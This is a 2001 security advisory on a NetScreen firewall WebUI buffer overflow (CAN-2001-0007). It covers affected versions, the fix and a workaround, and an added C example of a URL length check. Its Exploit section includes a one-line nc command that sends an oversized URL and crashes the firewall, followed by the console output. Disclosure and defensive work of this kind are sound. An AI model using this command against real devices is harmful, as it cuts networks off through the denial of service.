
Title: NetScreen Firewall WebUI Buffer Overflow vulnerability
Released by: Nsfocus
Date: 9th January 2001
NSFOCUS Security Advisory (SA2001-01)



Topic:  NetScreen Firewall WebUI Buffer Overflow vulnerability



Release Date: Jan 9th, 2001



CVE Candidate Numbers: CAN-2001-0007



Affected system:

================



ScreenOS release 1.73r1 on the NetScreen-1000

ScreenOS release 2.01r6 on the NetScreen-10/100

ScreenOS release 2.10r3 on the NetScreen-5

ScreenOS release 2.5r1  on the NetScreen-5/10/100



Non-affected system:

====================



ScreenOS release 1.73r2 on the NetScreen-1000

ScreenOS release 2.01r7 on the NetScreen-10/100

ScreenOS release 2.10r4 on the NetScreen-5

ScreenOS release 2.5r2  on the NetScreen-5/10/100



Impact:

=========



The NSFOCUS security team has found a buffer overflow vulnerability in
the NetScreen Firewall WebUI. By exploiting this vulnerability, a
malicious user can launch a remote DoS attack that crashes the firewall.



Description:

============



NetScreen Firewall is a popular commercial firewall. It has a Web
administration interface (listening on port 80 by default) that allows
the firewall administrator to configure the firewall with a browser.
However, it does not check the length of the input URL. An oversized
URL request may cause a buffer overflow that crashes the NetScreen
firewall. In that case, all connections through the firewall are
dropped, and the firewall no longer responds to any connection
request. The firewall must be rebooted to restore its functions.

Attackers can launch the attack without logging in to the firewall.

All current versions of ScreenOS, including 1.73r1, 2.0r6, 2.1r3 and
2.5r1, are affected by this vulnerability when WebUI has been
enabled.
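The missing URL length check described above, sketched as an added example in C (not NetScreen's code and not part of the advisory): a request-line parser that measures the request target and rejects it before any copy takes place. The names `parse_request_uri` and `status_for_uri_len` and the 1024-byte `URI_MAX` limit are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

#define URI_MAX 1024  /* assumed limit for illustration; the advisory gives only the 1220-byte crash point */

enum parse_status { PARSE_OK = 0, PARSE_BAD_REQUEST = 400, PARSE_URI_TOO_LONG = 414 };

/* Extract the request target from an HTTP request line into out.
 * req holds req_len received bytes and need not be NUL-terminated. */
enum parse_status parse_request_uri(const char *req, size_t req_len,
                                    char *out, size_t out_size)
{
    const char *end = req + req_len;
    const char *sp = memchr(req, ' ', req_len);   /* end of the method token */
    if (sp == NULL || sp == req)
        return PARSE_BAD_REQUEST;

    const char *uri = sp + 1, *p = uri;
    while (p < end && *p != ' ' && *p != '\r' && *p != '\n')
        p++;                                      /* never reads past req_len */
    size_t uri_len = (size_t)(p - uri);
    if (uri_len == 0 || uri[0] != '/')
        return PARSE_BAD_REQUEST;

    /* The check the advisory says was missing: measure first, copy second. */
    if (uri_len > URI_MAX || uri_len >= out_size)
        return PARSE_URI_TOO_LONG;
    memcpy(out, uri, uri_len);
    out[uri_len] = '\0';
    return PARSE_OK;
}

/* Constructed sample input: "GET /AAA... HTTP/1.0\r\n\r\n" whose target is uri_len bytes. */
int status_for_uri_len(size_t uri_len)
{
    static char req[4096];
    char out[URI_MAX + 1];
    if (uri_len < 1 || uri_len > 4000)
        return -1;
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', uri_len - 1);
    memcpy(req + 4 + uri_len, " HTTP/1.0\r\n\r\n", 13);
    return parse_request_uri(req, 17 + uri_len, out, sizeof out);
}

int main(void)
{
    printf("short=%d limit=%d oversized=%d\n", status_for_uri_len(16),
           status_for_uri_len(URI_MAX), status_for_uri_len(1221));
    return 0;
}
```

A caller would answer `PARSE_URI_TOO_LONG` with an HTTP 414 response and close the connection, so an oversized request never reaches a fixed-size buffer.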





Exploit:

==========



Once the input URL is longer than 1220 bytes, the NetScreen firewall
will crash:



$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc netscreen_firewall 80



The following information will appear on the firewall console:



****************************** EXCEPTION ******************************



Bus error execption (data reference: load or store)



EPC   = 0x8009AA1C,   SR    = 0x34501007,   Cause = 0x0080001C



Firewall halts now.





Workaround:

===================



Disable WebUI management, or designate a trusted administration host,
until the relevant patch has been obtained and installed.



Vendor Status:

==============



We notified NetScreen of this vulnerability on 12/19/2000.
On 12/26/2000 NetScreen issued the following ScreenOS release versions
to fix the bug:



ScreenOS 1.73r2  on the NetScreen-1000

ScreenOS 2.10r4  on the NetScreen-5

ScreenOS 2.01r7  on the NetScreen-10/100

ScreenOS 2.5.0r2 on the NetScreen-5/10/100



The latest software is available at:
http://www.netscreen.com/support/updates.html
You can also contact the NetScreen Technical Support Center
(mailto:support@netscreen.com) for upgraded software.



Additional Information:

========================



The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0007 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE entries.



DISCLAIMER:

===========

THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.



© Copyright 1999-2000 NSFOCUS. All Rights Reserved.





NSFOCUS Security Team 

NSFOCUS INFORMATION TECHNOLOGY CO.,LTD

(http://www.nsfocus.com)







